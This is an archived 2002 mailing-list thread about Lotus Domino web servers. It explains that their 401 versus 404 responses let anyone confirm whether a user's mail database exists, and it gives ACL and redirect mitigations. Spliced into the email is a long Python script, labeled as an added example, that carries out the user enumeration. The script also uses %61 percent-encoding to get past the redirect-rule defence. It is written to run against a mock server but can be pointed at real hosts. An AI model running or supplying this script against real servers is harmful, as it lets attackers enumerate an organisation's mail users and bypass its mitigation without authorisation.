RE: Script for find domino's users

From: Jay D. Thomson (jthomsonat_private)
Date: Fri Feb 08 2002 - 12:45:47 PST


    Simon,
    
    Proper ACL management is certainly required to provide security, however in
    this case it still won't prevent an attacker from remotely verifying a mail
    user's existence.  The key lies in the fact that Domino web servers will
    return a "401" unauthorized response if the database actually exists, and a
    "404" nonexistent URI if the database does not.  Since user mail databases
    are created by default when users are registered, this is a simple and easy
    way to test for existence.
    
    This can be easily tested by opening a web browser and attempting to access
    a known good mail database and then one that is known to be nonexistent.
    
    Obviously, if the anonymous user can actually access/read a user's mail
    database, that server has much bigger problems than what I describe above!
    
    There are several things administrators can do beyond what you describe to
    eliminate this issue:
    
    1) Choose not to allow email through the web (Application Security, Inc.
    recommends this for reasons I won't go into here)
    
    2) Force nonexistent mail/*.nsf database access attempts to return a 401
    unauthorized using a complex set of HTTP redirection rules set up in the
    server's server document.  Attackers can generally get around this by using
    HTTP escape characters (i.e. %61).
    
    Either way, administrators are going to want to run regular security scans
    against their Domino based webservers in order to see just what an attacker
    could determine/break.  Here at Application Security, Inc. (ASI) we're
    preparing to debut a new penetration testing tool specifically geared for
    Domino webservers.  This tool will not only tell you if users can be
    determined remotely, but it will also test mail database security, proper
    ACL management, the existence of serious remote vulnerabilities, user
    password strength, poor authentication mechanisms and more.  This is a lot
    of stuff for one or two people to keep straight on however many servers a
    company has; so we're attempting to remove both the burden and reduce
    the possibility of human error due to caffeine burnout.
    
    More information on our new pentesting offering is available at my company's
    website: www.appsecinc.com.
    
    
    Regards,
    _____________________________________________
    Jay D. Thomson
    Tel: 212-490-6022
    Fax: 212-490-6456
    E-mail: jthomsonat_private
    Web: www.appsecinc.com
    Application Security, Inc. - Protection Where it Counts -
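
    The 401/404 oracle and the %61 escape described in the reply above, as an
    added example (this is not Jay Thomson's, ASI's or Simon's code). It runs
    against a small constructed mock of the observed Domino behaviour so it
    works offline; the database names, user names and mock server are all
    assumptions, and probe_user() can be pointed at a real Domino host instead.

```python
"""Domino mail-user enumeration via the 401 (exists) / 404 (absent) oracle,
plus the percent-encoding trick that slips past a redirect rule matching the
literal '/mail/' prefix. Example code with a constructed mock server."""
import http.server
import threading
import urllib.error
import urllib.parse
import urllib.request

# Constructed data: mail files that "exist" on the mock server (hypothetical names).
EXISTING_DATABASES = {"/mail/jthomson.nsf", "/mail/sgrant.nsf"}


def domino_response(raw_path, databases, redirect_rule):
    """Status code the mock returns for a raw request path.
    - 401 when the decoded path names a database the anonymous user may not open
    - 401 when an admin redirect rule answers every raw '/mail/...' URI (mitigation 2)
    - 404 otherwise
    The rule matches the *raw* path while the database lookup uses the *decoded*
    path, which is exactly the gap a %61-style escape exploits."""
    decoded = urllib.parse.unquote(raw_path)
    if decoded in databases:
        return 401
    if redirect_rule and raw_path.startswith("/mail/"):
        return 401
    return 404


class MockDominoHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        status = domino_response(self.path, self.server.databases,
                                 self.server.redirect_rule)
        self.send_response(status)
        if status == 401:
            self.send_header("WWW-Authenticate", 'Basic realm="/"')
        self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


class MockDominoServer(http.server.HTTPServer):
    def __init__(self, databases, redirect_rule):
        super().__init__(("127.0.0.1", 0), MockDominoHandler)
        self.databases = databases
        self.redirect_rule = redirect_rule


def mail_db_path(username, obfuscate=False):
    """Build /mail/<user>.nsf; with obfuscate=True the 'a' in 'mail' is sent
    as %61 so a rule keyed on the literal prefix does not fire."""
    prefix = "/m%61il/" if obfuscate else "/mail/"
    return prefix + urllib.parse.quote(username) + ".nsf"


def classify(status):
    if status == 401:
        return "exists"                       # database present, auth required
    if status == 404:
        return "absent"                       # no such database
    if status == 200:
        return "exists-anonymous-readable"    # the "much bigger problem" case
    return "unknown"


def probe_user(base_url, username, obfuscate=False):
    """GET the user's mail database URI and classify the response."""
    req = urllib.request.Request(base_url + mail_db_path(username, obfuscate))
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code
    return classify(status)


def demo():
    """Probe two users against the mock with and without the redirect rule.
    Returns {(rule_enabled, user, obfuscated): classification}."""
    results = {}
    for rule in (False, True):
        server = MockDominoServer(EXISTING_DATABASES, redirect_rule=rule)
        base = "http://127.0.0.1:%d" % server.server_address[1]
        threading.Thread(target=server.serve_forever, daemon=True).start()
        try:
            for user in ("jthomson", "nobody"):
                for obf in (False, True):
                    results[(rule, user, obf)] = probe_user(base, user, obf)
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    for key, verdict in sorted(demo().items()):
        print("rule=%-5s user=%-9s obfuscated=%-5s -> %s" % (key + (verdict,)))
```

    With the redirect rule off, the plain probe separates real from bogus
    users outright. With the rule on, the plain probe sees 401 for everyone
    and the oracle appears closed, but the %61 variant still gets a 404 for
    the missing user, which is the bypass the reply warns about.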
    
    
    
    
    This isn't a proof of concept, but more a probe for misconfigured database
    ACLs.
    
    If a Domino web server doesn't have a redirection URL for /mail/* mail
    files, then you rely on the access control for each mail file.
    
    Two things can be done to avoid this :
    
    1 - Change the ACL on sensitive databases ( /mail/* , names.nsf ) to :
          Anonymous - No access
          [Default] - No access
    
    2 - Within the Server Document for each server, ensure that "Allow HTTP
    clients to browse databases:" is set to "No"
    
    I believe that all versions of Domino server from 4.5 upwards are
    susceptible to badly configured ACLs. Any good administrator would have a
    hold of this already.
    
    
    #!/usr/local/bin/php -q
    <?
    
    <snip>
    
    </snip>
    
    fclose ($fd);
    
    ?>
    



    This archive was generated by hypermail 2b30 : Sun Feb 10 2002 - 00:30:38 PST